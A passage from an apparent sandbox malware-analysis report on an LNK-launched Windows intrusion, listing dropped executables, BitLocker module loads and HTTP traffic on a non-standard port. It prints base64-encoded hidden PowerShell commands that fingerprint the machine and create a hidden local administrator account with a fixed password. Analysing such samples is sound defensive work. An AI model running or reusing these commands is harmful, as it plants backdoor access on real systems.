AEQAcgBpAHYAZQAuAE0AbwBkAGUAbAAKACAAIAAgACAAJABkAHIAaQB2AGUASQBuAGYAbwAgAD0AIAAiAFMAZQByAGkAYQBsACAATgB1AG0AYgBlAHIAOgAgACQAcwBlAHIAaQBhAGwATgB1AG0AYgBlAHIALAAgAE0AbwBkAGUAbAA6ACAAJABtAG8AZABlAGwAIgAKACAAIAAgACAAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAArAD0AIAAkAGQAcgBpAHYAZQBJAG4AZgBvAAoAfQAKACQAYwBvAG0AYgBpAG4AZQBkAEkAbgBmAG8AIAA9ACAAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAAtAGoAbwBpAG4AIAAiAGAAcgBgAG4AIgAKACQAYwBwAHUASQBuAGYAbwAgAD0AIABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMAIABXAGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzAG8AcgAKACQAYwBwAHUARABlAHQAYQBpAGwAcwAgAD0AIAAiAFAAcgBvAGMAZQBzAHMAbwByAEkAZAA6ACAAJAAoACQAYwBwAHUASQBuAGYAbwAuAFAAcgBvAGMAZQBzAHMAbwByAEkAZAApACwAIABOAGEAbQBlADoAIAAkACgAJABjAHAAdQBJAG4AZgBvAC4ATgBhAG0AZQApACwAIABNAGEAeABDAGwAbwBjAGsAUwBwAGUAZQBkADoAIAAkACgAJABjAHAAdQBJAG4AZgBvAC4ATQBhAHgAQwBsAG8AYwBrAFMAcABlAGUAZAApACwAIABVAG4AaQBxAHUAZQBJAGQAOgAgACQAKAAkAGMAcAB1AEkAbgBmAG8ALgBVAG4AaQBxAHUAZQBJAGQAKQAiAAoAJABhAGwAbABJAG4AZgBvACAAPQAgACIAJABjAG8AbQBiAGkAbgBlAGQASQBuAGYAbwBgAHIAYABuACQAYwBwAHUARABlAHQAYQBpAGwAcwAiAAoAJABtAGQANQAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAE0ARAA1AEMAcgB5AHAAdABvAFMAZQByAHYAaQBjAGUAUAByAG8AdgBpAGQAZQByAAoAJABiAHkAdABlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AEIAeQB0AGUAcwAoACQAYQBsAGwASQBuAGYAbwApAAoAJABoAGEAcwBoAEIAeQB0AGUAcwAgAD0AIAAkAG0AZAA1AC4AQwBvAG0AcAB1AHQAZQBIAGEAcwBoACgAJABiAHkAdABlAHMAKQAKACQAaABhAHMAaAAgAD0AIABbAEIAaQB0AEMAbwBuAHYAZQByAHQAZQByAF0AOgA6AFQAbwBTAHQAcgBpAG4AZwAoACQAaABhAHMAaABCAHkAdABlAHMAKQAgAC0AcgBlAHAAbABhAGMAZQAgACcALQAnAAoAIAAgACAAIAByAGUAdAB1AHIAbgAgACQAaABhAHMAaAA7AAoAfQAKAGMAZAAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAIgA7AAoAJAB0AGUAcwB0ACAAPQAgAEcAZQB0AC0ASQBkAGUAbgB0AGkAdAB5ADsACgAkAHQAZQBzAHQAIAB8ACAATwB1AHQALQBGAGkAbABlACAALQBGAGkAbABlAFAAYQB0AGgAIAAiAGQAZQB2AGkAYwBlAEkAZAAuAHQAeAB0ACIAIAAtAEUAbgBjAG8AZABpAG4AZwAgAFUAVABGADgA
Source: C:\Windows\Temp\svczHost.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand JABVAHMAZQByAG4AYQBtAGUAIAA9ACAAIgBVAHMAZQByADEAIgA7ACQAcAB3AGQAIAA9ACAAIgAxADIAMwA0ADUANgA3ADgAOQAhAEEAMQBhACIAOwAgACQAVQBzAGUAcgBQAGEAcgBhAG0AcwAgAD0AIABAAHsAJwBOAGEAbQBlACcAIAA9ACAAJABVAHMAZQByAG4AYQBtAGUAOwAgACcAUABhAHMAcwB3AG8AcgBkACcAIAA9ACAAKABDAG8AbgB2AGUAcgB0AFQAbwAtAFMAZQBjAHUAcgBlAFMAdAByAGkAbgBnACAALQBTAHQAcgBpAG4AZwAgACQAcAB3AGQAIAAtAEEAcwBQAGwAYQBpAG4AVABlAHgAdAAgAC0ARgBvAHIAYwBlACkAOwAgACcAUABhAHMAcwB3AG8AcgBkAE4AZQB2AGUAcgBFAHgAcABpAHIAZQBzACcAIAA9ACAAJAB0AHIAdQBlAH0AOwBOAGUAdwAtAEwAbwBjAGEAbABVAHMAZQByACAAQABVAHMAZQByAFAAYQByAGEAbQBzADsAJABHAHIAbwB1AHAAUABhAHIAYQBtAHMAIAA9ACAAQAB7ACcARwByAG8AdQBwACcAIAA9ACAAJwBBAGQAbQBpAG4AaQBzAHQAcgBhAHQAbwByAHMAJwA7ACAAJwBNAGUAbQBiAGUAcgAnACAAPQAgACQAVQBzAGUAcgBuAGEAbQBlAH0AOwBBAGQAZAAtAEwAbwBjAGEAbABHAHIAbwB1AHAATQBlAG0AYgBlAHIAIABAAEcAcgBvAHUAcABQAGEAcgBhAG0AcwA7AA0ACgA=
Source: C:\Windows\Temp\svczHost.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand ZwBlAHQALQBzAGUAcgB2AGkAYwBlACAAIgBtAHkAUgBkAHAAUwBlAHIAdgBpAGMAZQAiAA==
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -w hidden -nologo -nop -ep bypass -EncodedCommand QQBkAGQALQBUAHkAcABlACAALQBBAHMAcwBlAG0AYgBsAHkATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwA7ACAAWwBTAHkAcwB0AGUAbQAuAFcAaQBuAGQAbwB3AHMALgBGAG8AcgBtAHMALgBTAGMAcgBlAGUAbgBdADoAOgBBAGwAbABTAGMAcgBlAGUAbgBzACAAfAAgAEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAAgAHsAIAAiACQAKAAkAF8ALgBCAG8AdQBuAGQAcwAuAFcAaQBkAHQAaAApAHgAJAAoACQAXwAuAEIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQAiACAAfQAgAHwAIABPAHUAdAAtAEYAaQBsAGUAIAAtAEYAaQBsAGUAUABhAHQAaAAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAXABkAHAAIgA=

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\oho2nqxk\oho2nqxk.cmdline"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\oho2nqxk\oho2nqxk.cmdline"			Jump to behavior

Source: svczHost.exe.13.dr	Static PE information: section name: .managed
Source: svczHost.exe.13.dr	Static PE information: section name: hydrated
Source: myRdpService.exe.21.dr	Static PE information: section name: .managed
Source: myRdpService.exe.21.dr	Static PE information: section name: hydrated

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_00007FF9BA9502AD push E95D5E73h; ret	3_2_00007FF9BA950459
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_00007FF9BA967C6E pushad ; retf	4_2_00007FF9BA967C9D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_00007FF9BA96846E pushad ; ret	4_2_00007FF9BA96849D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_00007FF9BA967C9E push eax; retf	4_2_00007FF9BA967CAD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_00007FF9BA96849E push eax; ret	4_2_00007FF9BA9684AD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_00007FF9BA9779D4 push ebx; retf	4_2_00007FF9BA9779DA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_00007FF9BA960580 pushad ; retf	4_2_00007FF9BA9605ED
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_00007FF9BA9775D7 push ebx; iretd	4_2_00007FF9BA9775DA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_00007FF9BAA31B14 push esi; iretd	4_2_00007FF9BAA31B17
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00007FF9BA80D2A5 pushad ; iretd	8_2_00007FF9BA80D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00007FF9BA926709 push ebx; retf	8_2_00007FF9BA92670A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00007FF9BA926987 push esp; retf	8_2_00007FF9BA926988
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 54_2_00007FF9BAA10900 push eax; retf	54_2_00007FF9BAA10901

Persistence and Installation Behavior

Windows shortcut file (LNK) starts blacklisted processes

Source: LNK file	Process created: C:\Windows\System32\cmd.exe
Source: LNK file	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK file	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK file	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK file	Process created: C:\Windows\System32\cmd.exe
Source: LNK file	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK file	Process created: C:\Windows\System32\cmd.exe
Source: LNK file	Process created: C:\Windows\System32\cmd.exe
Source: LNK file	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK file	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK file	Process created: C:\Windows\System32\cmd.exe
Source: LNK file	Process created: C:\Windows\System32\cmd.exe
Source: LNK file	Process created: C:\Windows\System32\cmd.exe
Source: LNK file	Process created: C:\Windows\System32\cmd.exe
Source: LNK file	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK file	Process created: C:\Windows\System32\cmd.exe
Source: LNK file	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK file	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK file	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Jump to behavior
Source: LNK file	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Jump to behavior
Source: LNK file	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Jump to behavior
Source: LNK file	Process created: C:\Windows\System32\cmd.exe	Jump to behavior
Source: LNK file	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK file	Process created: C:\Windows\System32\cmd.exe
Source: LNK file	Process created: C:\Windows\System32\cmd.exe
Source: LNK file	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK file	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK file	Process created: C:\Windows\System32\cmd.exe
Source: LNK file	Process created: C:\Windows\System32\cmd.exe
Source: LNK file	Process created: C:\Windows\System32\cmd.exe
Source: LNK file	Process created: C:\Windows\System32\cmd.exe
Source: LNK file	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK file	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK file	Process created: C:\Windows\System32\cmd.exe
Source: LNK file	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Windows\Temp\svczHost.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Users\user\AppData\Local\Temp\oho2nqxk\oho2nqxk.dll	Jump to dropped file
Source: C:\Windows\Temp\svczHost.exe	File created: C:\Windows\Temp\myRdpService.exe	Jump to dropped file

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Windows\Temp\svczHost.exe			Jump to dropped file
Source: C:\Windows\Temp\svczHost.exe	File created: C:\Windows\Temp\myRdpService.exe			Jump to dropped file

Source: C:\Windows\Temp\myRdpService.exe

Registry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Application\myRdpService

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\sc.exe sc query myRdpService

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49786 -> 8000
Source: unknown	Network traffic detected: HTTP traffic on port 8000 -> 49786
Source: unknown	Network traffic detected: HTTP traffic on port 49787 -> 8000
Source: unknown	Network traffic detected: HTTP traffic on port 8000 -> 49787
Source: unknown	Network traffic detected: HTTP traffic on port 49788 -> 8000
Source: unknown	Network traffic detected: HTTP traffic on port 8000 -> 49788

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
